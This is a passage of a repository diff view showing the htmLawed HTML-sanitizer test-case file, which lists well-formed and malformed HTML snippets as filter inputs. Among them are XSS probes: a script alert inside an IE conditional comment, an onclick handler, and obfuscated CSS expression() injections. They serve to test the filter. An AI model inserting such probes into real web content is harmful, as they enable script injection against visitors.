summaryrefslogtreecommitdiff
path: root/lib/htmlawed/htmLawed_TESTCASE.txt
diff options
context:
space:
mode:
Diffstat (limited to 'lib/htmlawed/htmLawed_TESTCASE.txt')
-rwxr-xr-xlib/htmlawed/htmLawed_TESTCASE.txt910
1 files changed, 455 insertions, 455 deletions
diff --git a/lib/htmlawed/htmLawed_TESTCASE.txt b/lib/htmlawed/htmLawed_TESTCASE.txt
index 24b00e7..2e64421 100755
--- a/lib/htmlawed/htmLawed_TESTCASE.txt
+++ b/lib/htmlawed/htmLawed_TESTCASE.txt
@@ -1,455 +1,455 @@
1/* 1/*
2htmLawed_TESTCASE.txt, 24 September 2019 2htmLawed_TESTCASE.txt, 24 September 2019
3To test htmLawed 3To test htmLawed
4Copyright Santosh Patnaik 4Copyright Santosh Patnaik
5Dual licensed with LGPL 3 and GPL 2+ 5Dual licensed with LGPL 3 and GPL 2+
6A PHP Labware internal utility - www.bioinformatics.org/phplabware/internal_utilities/htmLawed 6A PHP Labware internal utility - www.bioinformatics.org/phplabware/internal_utilities/htmLawed
7*/ 7*/
8 8
9This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit. 9This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit.
10 10
11************************************************ 11************************************************
12when viewing this file in a web browser, set the 12when viewing this file in a web browser, set the
13character encoding to Unicode/UTF-8 13character encoding to Unicode/UTF-8
14************************************************ 14************************************************
15 15
16--------------------- start -------------------- 16--------------------- start --------------------
17 17
18<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br /> 18<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br />
19 19
20<h6>Attributes</h6> 20<h6>Attributes</h6>
21 21
22<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br /> 22<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br />
23<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled />, <input type="text" disabled="DISABLED" />, <input type="text" disabled="1" /><br /> 23<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled />, <input type="text" disabled="DISABLED" />, <input type="text" disabled="1" /><br />
24<strong>Required:</strong> <img />, <img alt="image" /><br /> 24<strong>Required:</strong> <img />, <img alt="image" /><br />
25<strong>Quote & space variation:</strong> <a id=id1 name=xy>a</a>, <a id='id2' name="xy">a</a>, <a id=' id3 ' name = "n" >a</a><br /> 25<strong>Quote & space variation:</strong> <a id=id1 name=xy>a</a>, <a id='id2' name="xy">a</a>, <a id=' id3 ' name = "n" >a</a><br />
26<strong>Invalid:</strong> <a id="id4" src="s">a</a><br /> 26<strong>Invalid:</strong> <a id="id4" src="s">a</a><br />
27<strong>Duplicated:</strong> <a id="id5" id="id6">a</a><br /> 27<strong>Duplicated:</strong> <a id="id5" id="id6">a</a><br />
28<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr noshade="noshade" /><br /> 28<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr noshade="noshade" /><br />
29<strong>Casing:</strong> <a HREF=""></a><br /> 29<strong>Casing:</strong> <a HREF=""></a><br />
30<strong>Custom:</strong> <img alt="image" my:data="portrait" /><br /> 30<strong>Custom:</strong> <img alt="image" my:data="portrait" /><br />
31<strong>Data-*:</strong> <a data-xml="x" data-xmnt="x" data-xmlnt="x" data-xmn:t="x" data-12="x" data-רש="x" data-xmxm="x">a</a><br /> 31<strong>Data-*:</strong> <a data-xml="x" data-xmnt="x" data-xmlnt="x" data-xmn:t="x" data-12="x" data-רש="x" data-xmxm="x">a</a><br />
32<strong>Admin-restricted?:</strong> <a href="x" onclick="alert();"></a> 32<strong>Admin-restricted?:</strong> <a href="x" onclick="alert();"></a>
33 33
34<h6>Attribute values</h6> 34<h6>Attribute values</h6>
35 35
36<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a id="id8"></a><br /> 36<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a id="id8"></a><br />
37(try 'my_' for prefix)<br /> 37(try 'my_' for prefix)<br />
38<strong>Double-quotes in value:</strong><a title=ab"c"></a>, <a title="ab"c"></a>, <a title='ab"c'></a><br /> 38<strong>Double-quotes in value:</strong><a title=ab"c"></a>, <a title="ab"c"></a>, <a title='ab"c'></a><br />
39(try filter for CSS expression)<br /> 39(try filter for CSS expression)<br />
40<strong>CSS expression</strong>: <div style="prop:expression();"></div><div style="prop:expression()"></div><div style="prop: expression();"></div><div style="prop : expression()"></div><div style="prop:expression(js);"></div><div style="prop:expression(js;)"></div><div style="prop: expression('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop&#x3a;expression( 'js&#x40; );"></div><br /> 40<strong>CSS expression</strong>: <div style="prop:expression();"></div><div style="prop:expression()"></div><div style="prop: expression();"></div><div style="prop : expression()"></div><div style="prop:expression(js);"></div><div style="prop:expression(js;)"></div><div style="prop: expression('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop&#x3a;expression( 'js&#x40; );"></div><br />
41<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br /> 41<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br />
42(try 'maxlen', 'maxval', etc., for 'input' in '$spec') 42(try 'maxlen', 'maxval', etc., for 'input' in '$spec')
43 43
44<h6>Blockquotes</h6> 44<h6>Blockquotes</h6>
45 45
46<blockquote>abc</blockquote><br /> 46<blockquote>abc</blockquote><br />
47<blockquote>abc<div>def</div></blockquote><br /> 47<blockquote>abc<div>def</div></blockquote><br />
48<blockquote><div>abc</div>def</blockquote><br /> 48<blockquote><div>abc</div>def</blockquote><br />
49<blockquote>abc<div>def</div>ghi</blockquote><br /> 49<blockquote>abc<div>def</div>ghi</blockquote><br />
50abc<div>def</div>ghi<br /> 50abc<div>def</div>ghi<br />
51<blockquote>QQQ<div>x</div><!-- comment --></blockquote><br /> 51<blockquote>QQQ<div>x</div><!-- comment --></blockquote><br />
52<blockquote><div>x</div><!-- comment -->QQQ</blockquote><br /> 52<blockquote><div>x</div><!-- comment -->QQQ</blockquote><br />
53<blockquote><!-- comment --><div>x</div>QQQ<div>x</div></blockquote><br /> 53<blockquote><!-- comment --><div>x</div>QQQ<div>x</div></blockquote><br />
54<blockquote><div>x<!-- comment --></div>QQQ</blockquote><p>x</p><br /> 54<blockquote><div>x<!-- comment --></div>QQQ</blockquote><p>x</p><br />
55<br /> 55<br />
56(try with blockquote parent) 56(try with blockquote parent)
57 57
58<h6>CDATA sections</h6> 58<h6>CDATA sections</h6>
59 59
60<strong>Special characters inside:</strong> <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 &gt; 4 ]]><br /> 60<strong>Special characters inside:</strong> <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 &gt; 4 ]]><br />
61<strong>Normal:</strong> <![CDATA[ check ]]>, <em>CDATA follows:<![CDATA[ check ]]></em><br /> 61<strong>Normal:</strong> <![CDATA[ check ]]>, <em>CDATA follows:<![CDATA[ check ]]></em><br />
62<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]><br /> 62<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]><br />
63<strong>Invalid:</strong> <em <![CDATA[ check ]]>>CDATA in tag content</em>, <table><![CDATA[ check ]]><tr><td>text not allowed</td></tr></table> 63<strong>Invalid:</strong> <em <![CDATA[ check ]]>>CDATA in tag content</em>, <table><![CDATA[ check ]]><tr><td>text not allowed</td></tr></table>
64 64
65<h6>Complex-1: deprecated elements</h6> 65<h6>Complex-1: deprecated elements</h6>
66 66
67<center> 67<center>
68The PHP <s>software</s> script used for this <strike>web-page</strike> webpage is <font style="font-weight: bold " face=arial size='+3' color = "red ">htmLawedTest.php</font>, from <u style= 'color:green'>PHP Labware</u>. 68The PHP <s>software</s> script used for this <strike>web-page</strike> webpage is <font style="font-weight: bold " face=arial size='+3' color = "red ">htmLawedTest.php</font>, from <u style= 'color:green'>PHP Labware</u>.
69</center> 69</center>
70 70
71<h6>Complex-2: deprecated attributes</h6> 71<h6>Complex-2: deprecated attributes</h6>
72 72
73<img src="s" alt="a" name="n" /><img src="s" alt="a" id="id9" name="n" /> 73<img src="s" alt="a" name="n" /><img src="s" alt="a" id="id9" name="n" />
74<br clear="left" /> 74<br clear="left" />
75<hr noshade size="1" /> 75<hr noshade size="1" />
76<img name="id10" src="s" align="left" alt="image" hspace="10" vspace="10" width="10em" height="20" border="1" style="padding:5px;" /> 76<img name="id10" src="s" align="left" alt="image" hspace="10" vspace="10" width="10em" height="20" border="1" style="padding:5px;" />
77<table width="50em" align="center" bgcolor="red"> 77<table width="50em" align="center" bgcolor="red">
78 <tr> 78 <tr>
79 <td width="20%"> 79 <td width="20%">
80 <div align="center"> 80 <div align="center">
81 <h3 align="right">Section</h3> 81 <h3 align="right">Section</h3>
82 <p align="right">Para</p> 82 <p align="right">Para</p>
83 <ol type="a" start="e"><li value="x"><a name="x">First</a> <a name="x" id="id11">item</a></li></ol> 83 <ol type="a" start="e"><li value="x"><a name="x">First</a> <a name="x" id="id11">item</a></li></ol>
84 </div> 84 </div>
85 </td> 85 </td>
86 <td width="*"> 86 <td width="*">
87 <ol type="1"><li>First item</li></ol> 87 <ol type="1"><li>First item</li></ol>
88 </td> 88 </td>
89 </tr> 89 </tr>
90 </table> 90 </table>
91<br clear="all" /> 91<br clear="all" />
92 92
93<h6>Complex-3: embed, object, area</h6> 93<h6>Complex-3: embed, object, area</h6>
94 94
95<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ"></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object><br /> 95<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ"></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object><br />
96 96
97<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed><br /> 97<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed><br />
98 98
99<object data="1.gif" type="image/gif" usemap="#map1"><map name="map1"> 99<object data="1.gif" type="image/gif" usemap="#map1"><map name="map1">
100<p>navigate the site: <a href="1" shape="REct" coOrds="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p> 100<p>navigate the site: <a href="1" shape="REct" coOrds="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p>
101<area href="5" shape="Rect" coords="0,0,118,28"> 101<area href="5" shape="Rect" coords="0,0,118,28">
102</map></object> 102</map></object>
103 103
104<param name="name">value</param> 104<param name="name">value</param>
105 105
106<object id="obj1"> 106<object id="obj1">
107 <param name="param1"> 107 <param name="param1">
108 <object id="obj2"> 108 <object id="obj2">
109 <param name="param2"> 109 <param name="param2">
110 </object> 110 </object>
111</object> 111</object>
112 112
113<h6>Complex-4: nested and other tables</h6> 113<h6>Complex-4: nested and other tables</h6>
114 114
115<table border="1" bgcolor="red"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" bgcolor="green"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br /> 115<table border="1" bgcolor="red"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" bgcolor="green"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br />
116<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br /> 116<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br />
117<strong>Missing tr:</strong> <table><td>Well</td></table><br /> 117<strong>Missing tr:</strong> <table><td>Well</td></table><br />
118 118
119<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6> 119<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6>
120 120
121(Try different 'keep_bad' values) 121(Try different 'keep_bad' values)
122<*> Pseudotags <*> 122<*> Pseudotags <*>
123<xml>Non-HTML tag xml</xml> 123<xml>Non-HTML tag xml</xml>
124<p> 124<p>
125Disallowed tag p 125Disallowed tag p
126</p> 126</p>
127<ul>Bad<li>OK</li></ul> 127<ul>Bad<li>OK</li></ul>
128 128
129<h6>Elements</h6> 129<h6>Elements</h6>
130 130
131<strong>Unbalanced:</strong> <a href="h"><em>check</a></em><br /> 131<strong>Unbalanced:</strong> <a href="h"><em>check</a></em><br />
132<strong>Non-XHTML:</strong> <div><center><dir></dir></center></div><br /> 132<strong>Non-XHTML:</strong> <div><center><dir></dir></center></div><br />
133<strong>Malformed:</strong> < a href=""></a>, <a href="" ></a>, <a href="" ></a>, <a href="" 133<strong>Malformed:</strong> < a href=""></a>, <a href="" ></a>, <a href="" ></a>, <a href=""
134></a>, <a href="">< /a>, < a href=""></a >, <img src="s" alt="a" />, <img src="s" alt="a"/ >, <imgsrc="s" alt="a" /><br /> 134></a>, <a href="">< /a>, < a href=""></a >, <img src="s" alt="a" />, <img src="s" alt="a"/ >, <imgsrc="s" alt="a" /><br />
135<strong>Invalid:</strong> <image src="s" alt="a" /><br /> 135<strong>Invalid:</strong> <image src="s" alt="a" /><br />
136<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a"></img>, <img src="s" alt="a">text</img><br /> 136<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a"></img>, <img src="s" alt="a">text</img><br />
137<strong>Content invalid:</strong> <a href="h">1<a>2</a></a><br /> 137<strong>Content invalid:</strong> <a href="h">1<a>2</a></a><br />
138<strong>Content invalid?:</strong> <form></form><br /> (try setting 'form' as parent)<br /> 138<strong>Content invalid?:</strong> <form></form><br /> (try setting 'form' as parent)<br />
139<strong>Casing:</strong> <A href=""></a><br /> 139<strong>Casing:</strong> <A href=""></a><br />
140<strong>Check for tidy:</strong> <br /><hr /></div><hr /></div><hr /></div><div>hi</div> 140<strong>Check for tidy:</strong> <br /><hr /></div><hr /></div><hr /></div><div>hi</div>
141 141
142<h6>Entities</h6> 142<h6>Entities</h6>
143 143
144<strong>Special:</strong> &amp; 3 < 2 & 5>4 and j >i >a & i<j>a<br /> 144<strong>Special:</strong> &amp; 3 < 2 & 5>4 and j >i >a & i<j>a<br />
145<strong>Padding:</strong> &#00066; &#066; &#x00066; &#x066; &#x003; &#0003;<br /> 145<strong>Padding:</strong> &#00066; &#066; &#x00066; &#x066; &#x003; &#0003;<br />
146<strong>Malformed:</strong> & #x27;, &x27;, &#x27; &TILDE;, &tilde<br /> 146<strong>Malformed:</strong> & #x27;, &x27;, &#x27; &TILDE;, &tilde<br />
147<strong>Invalid:</strong> &#x3;, &#55296;, &#03;, &#1114112;, &#xffff, &bad;<br /> 147<strong>Invalid:</strong> &#x3;, &#55296;, &#03;, &#1114112;, &#xffff, &bad;<br />
148<strong>Discouraged characters:</strong> &#x7f;, &#132;, &#64992;, &#1114110;<br /> 148<strong>Discouraged characters:</strong> &#x7f;, &#132;, &#64992;, &#1114110;<br />
149<strong>Context:</strong> '&gt;', &lt;?<br /> 149<strong>Context:</strong> '&gt;', &lt;?<br />
150<strong>Casing:</strong> &#X27;, &#x27;, &TILDE;, &tilde; 150<strong>Casing:</strong> &#X27;, &#x27;, &TILDE;, &tilde;
151<br /> 151<br />
152(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions) 152(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions)
153 153
154<h6>Format</h6> 154<h6>Format</h6>
155 155
156<strong>Valid but ill-formatted:</strong> text <!-- comment --> 156<strong>Valid but ill-formatted:</strong> text <!-- comment -->
157text <!-- 157text <!--
158A c o m m e n t --> 158A c o m m e n t -->
159<script> 159<script>
160 <![CDATA[ 160 <![CDATA[
161 code 161 code
162 ]]> 162 ]]>
163</script><!-- comment --><![CDATA[ cdata ]]> <a>text</b> text<pre id="none">p r e</pre> 163</script><!-- comment --><![CDATA[ cdata ]]> <a>text</b> text<pre id="none">p r e</pre>
164<textarea>text</textarea> <textarea> 164<textarea>text</textarea> <textarea>
165 text text 165 text text
166</textarea> text text <br /><hr /> 166</textarea> text text <br /><hr />
167text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em> 167text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em>
168text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b> 168text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b>
169 <a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b> 169 <a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b>
170 </a> 170 </a>
171<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span> 171<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span>
172<script>script</script> 172<script>script</script>
173<div> 173<div>
174 <pre id="none">p <a>r</a> e <!-- comment --> </pre> 174 <pre id="none">p <a>r</a> e <!-- comment --> </pre>
175 <pre> 175 <pre>
176 pre 176 pre
177 </pre> 177 </pre>
178</div> 178</div>
179<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div> 179<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div>
180(try to compact or beautify) 180(try to compact or beautify)
181 181
182<h6>Forms</h6> 182<h6>Forms</h6>
183 183
184(note nesting of 'form', missing required attributes, etc.)<br /> 184(note nesting of 'form', missing required attributes, etc.)<br />
185<form> 185<form>
186<script type="text/javascript">s</script> 186<script type="text/javascript">s</script>
187<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1"></fieldset> 187<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1"></fieldset>
188<input name="h" type="checkbox" value="h" tabindex="20"> h 188<input name="h" type="checkbox" value="h" tabindex="20"> h
189<textarea name="t">t</textarea> 189<textarea name="t">t</textarea>
190<form action="a" method="get"></form></form><br /> 190<form action="a" method="get"></form></form><br />
191<form action="b" method="get"><p><input type="text" value="i" /></form><br /> 191<form action="b" method="get"><p><input type="text" value="i" /></form><br />
192<form>B:<input type="text" value="b" />C:<input type="text" value="c" /></form><br /> 192<form>B:<input type="text" value="b" />C:<input type="text" value="c" /></form><br />
193(try each of these lines separately)<br /> 193(try each of these lines separately)<br />
194<form action="a">what<br /> 194<form action="a">what<br />
195<form action="a">what 195<form action="a">what
196(try with container as div and as form)<br /> 196(try with container as div and as form)<br />
197<form>c <a>a</a> <b>b</b><input /><script>s</script> 197<form>c <a>a</a> <b>b</b><input /><script>s</script>
198 198
199<h6>HTML comments (also CDATA)</h6> 199<h6>HTML comments (also CDATA)</h6>
200 200
201<strong>Script inside:</strong> <!--[if gte IE 4]> 201<strong>Script inside:</strong> <!--[if gte IE 4]>
202<SCRIPT>alert('XSS');</SCRIPT> 202<SCRIPT>alert('XSS');</SCRIPT>
203<![endif]--><br /> 203<![endif]--><br />
204<strong>Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 &gt; 4 -->, <!-- che--ck -->, <!--[if !IE]> <--><a>c</a><!--> <![endif]--><br /> 204<strong>Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 &gt; 4 -->, <!-- che--ck -->, <!--[if !IE]> <--><a>c</a><!--> <![endif]--><br />
205<strong>Normal:</strong> <!-- check -->, <!--check -->, <em>comment:<!-- check --></em><!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table><br /> 205<strong>Normal:</strong> <!-- check -->, <!--check -->, <em>comment:<!-- check --></em><!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table><br />
206<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]><br /> 206<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]><br />
207Invalid:</strong> <em <!-- check -->>comment in tag content</em>, <!--check--> 207Invalid:</strong> <em <!-- check -->>comment in tag content</em>, <!--check-->
208 208
209<h6>HTML5</h6> 209<h6>HTML5</h6>
210 210
211<strong>figure and figcaption:</strong> <figure><img src="picture.jpg" alt="picture"><figcaption>Caption for the awesome picture</figcaption></figure> 211<strong>figure and figcaption:</strong> <figure><img src="picture.jpg" alt="picture"><figcaption>Caption for the awesome picture</figcaption></figure>
212<strong>article:</strong> <h1>A</h1><p>B</p><article><h2>C</h2></article><article><h2>E</h2><p>F</p><p>G</p></article> 212<strong>article:</strong> <h1>A</h1><p>B</p><article><h2>C</h2></article><article><h2>E</h2><p>F</p><p>G</p></article>
213<strong>meter</strong>: <p>Heat <meter min="100" max="200" value="150">150</meter>.</p> 213<strong>meter</strong>: <p>Heat <meter min="100" max="200" value="150">150</meter>.</p>
214<strong>datalist</strong>: <input list="b" /><datalist id="b"><option value="c"><option value="d"></datalist> 214<strong>datalist</strong>: <input list="b" /><datalist id="b"><option value="c"><option value="d"></datalist>
215 215
216<h6>Ins-Del</h6> 216<h6>Ins-Del</h6>
217 217
218(depending on context, these elements can be of either block or inline type)<br /> 218(depending on context, these elements can be of either block or inline type)<br />
219<p><ins datetime="d" cite="c"><div>block</div></ins></p><br /> 219<p><ins datetime="d" cite="c"><div>block</div></ins></p><br />
220<p><del>d</del></p><br /> 220<p><del>d</del></p><br />
221<p><ins><del>d</del></ins></p><div><ins><p><del><div>d</div></del></p></ins></div><ins><div>d</div></ins> 221<p><ins><del>d</del></ins></p><div><ins><p><del><div>d</div></del></p></ins></div><ins><div>d</div></ins>
222 222
223<h6>Lists</h6> 223<h6>Lists</h6>
224 224
225<strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br /> 225<strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br />
226<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br /> 226<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br />
227<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b<dd>second</dl><br /> 227<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b<dd>second</dl><br />
228<strong>Definition lists, nested</strong>: <dl> 228<strong>Definition lists, nested</strong>: <dl>
229 <dt>T1</dt> 229 <dt>T1</dt>
230 <dd>D1</dd> 230 <dd>D1</dd>
231 <dt>T2</dt> 231 <dt>T2</dt>
232 <dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd> 232 <dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd>
233 <dt>T3</dt> 233 <dt>T3</dt>
234 <dd>D3</dd> 234 <dd>D3</dd>
235 <dt>T4</dt> 235 <dt>T4</dt>
236 <dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd> 236 <dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd>
237</dl><br /> 237</dl><br />
238<strong>Definition lists, nested, close-tags omitted</strong>: <dl> 238<strong>Definition lists, nested, close-tags omitted</strong>: <dl>
239 <dt>T1 239 <dt>T1
240 <dd>D1</dd> 240 <dd>D1</dd>
241 <dt>T2</dt> 241 <dt>T2</dt>
242 <dd>D2<dl><dt>t1<dd>d1<dt>t2</dt><dd>d2</dd></dl></dd> 242 <dd>D2<dl><dt>t1<dd>d1<dt>t2</dt><dd>d2</dd></dl></dd>
243 <dt>T3 243 <dt>T3
244 <dd>D3 244 <dd>D3
245 <dt>T4 245 <dt>T4
246 <dd>D4<dl><dt>t1<dd>d1</dl></dd> 246 <dd>D4<dl><dt>t1<dd>d1</dl></dd>
247</dl><br /> 247</dl><br />
248<strong>Nested</strong>: <ul> 248<strong>Nested</strong>: <ul>
249 <li>l1</li> 249 <li>l1</li>
250 <li>l2<ol><li>lo1</li><li>lo2</li></ol></li> 250 <li>l2<ol><li>lo1</li><li>lo2</li></ol></li>
251 <li>l3</li> 251 <li>l3</li>
252 <li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li> 252 <li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li>
253</ul><br /> 253</ul><br />
254<strong>Nested, directly</strong>: <ul> 254<strong>Nested, directly</strong>: <ul>
255 <li>l1</li> 255 <li>l1</li>
256 <ol>l2</ol> 256 <ol>l2</ol>
257 <li>l3</li> 257 <li>l3</li>
258</ul><br /> 258</ul><br />
259<strong>Nested, close-tags omitted</strong>: <ul> 259<strong>Nested, close-tags omitted</strong>: <ul>
260 <li>l1</li> 260 <li>l1</li>
261 <li>l2<ol><li>lo1<li>lo2</ol> 261 <li>l2<ol><li>lo1<li>lo2</ol>
262 <li>l3 262 <li>l3
263 <li>l4<ol><li>lo3<li>lo4<ol><li>lo5</ol></ol> 263 <li>l4<ol><li>lo3<li>lo4<ol><li>lo5</ol></ol>
264</ul><br /> 264</ul><br />
265<strong>Complex</strong>: 265<strong>Complex</strong>:
266<ol><script></script><li><table><tr><td> 266<ol><script></script><li><table><tr><td>
267<ul><li id="search" class="widget widget_search"> <form id="searchform" method="get" action="http://kohei.us"> 267<ul><li id="search" class="widget widget_search"> <form id="searchform" method="get" action="http://kohei.us">
268 <div> 268 <div>
269 269
270 <input type="text" name="s" id="s" size="15" /><br /> 270 <input type="text" name="s" id="s" size="15" /><br />
271 <input type="submit" value="Search" /> 271 <input type="submit" value="Search" />
272 </div> 272 </div>
273 </form> 273 </form>
274 </li></ul> 274 </li></ul>
275</td></tr></table></li></ol> 275</td></tr></table></li></ol>
276<strong>Menu</strong>: <menu type="toolbar"><li><menu label="File"> 276<strong>Menu</strong>: <menu type="toolbar"><li><menu label="File">
277 <button type="button" onclick="new()">New...</button> 277 <button type="button" onclick="new()">New...</button>
278 </menu></li><li><menu label="Edit"><button type="button" onclick="cut()">Cut...</button></menu></li> 278 </menu></li><li><menu label="Edit"><button type="button" onclick="cut()">Cut...</button></menu></li>
279 </menu> 279 </menu>
280 280
281<h6>Microdata</h6> 281<h6>Microdata</h6>
282 282
283<div itemscope itemtype="http://data-vocabulary.org/Person"> 283<div itemscope itemtype="http://data-vocabulary.org/Person">
284I am <span itemprop="name">X</span> but people call me <span itemprop="nickname">Y</span>. 284I am <span itemprop="name">X</span> but people call me <span itemprop="nickname">Y</span>.
285Find me at <a href="http://www.xy.com" itemprop="url">www.xy.com</a> 285Find me at <a href="http://www.xy.com" itemprop="url">www.xy.com</a>
286</div> 286</div>
287 287
288<h6>Microsoft Word</h6> 288<h6>Microsoft Word</h6>
289 289
290<strong>Proprietary tag</strong>: <p class=3DMsoNormal><o:p>&nbsp;</o:p></p><br /> 290<strong>Proprietary tag</strong>: <p class=3DMsoNormal><o:p>&nbsp;</o:p></p><br />
291<strong>XML declaration</strong>: <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><br /> 291<strong>XML declaration</strong>: <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><br />
292<strong>XML-invalid character code-point (may not replicate)</strong>: <p class=3DMsoNormal>“Where is he?” asked both Mary – the one so lovely – and Jane.</p> 292<strong>XML-invalid character code-point (may not replicate)</strong>: <p class=3DMsoNormal>“Where is he?” asked both Mary – the one so lovely – and Jane.</p>
293 293
294<h6>Nesting</h6> 294<h6>Nesting</h6>
295 295
296<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link"><div>hi</div></a><br /> 296<strong>Block or inline a</strong>: <p><a href="link">text</a></p><a href="link"><div>hi</div></a><br />
297 297
298<h6>Non-English text-1</h6> 298<h6>Non-English text-1</h6>
299 299
300Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br /> 300Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br />
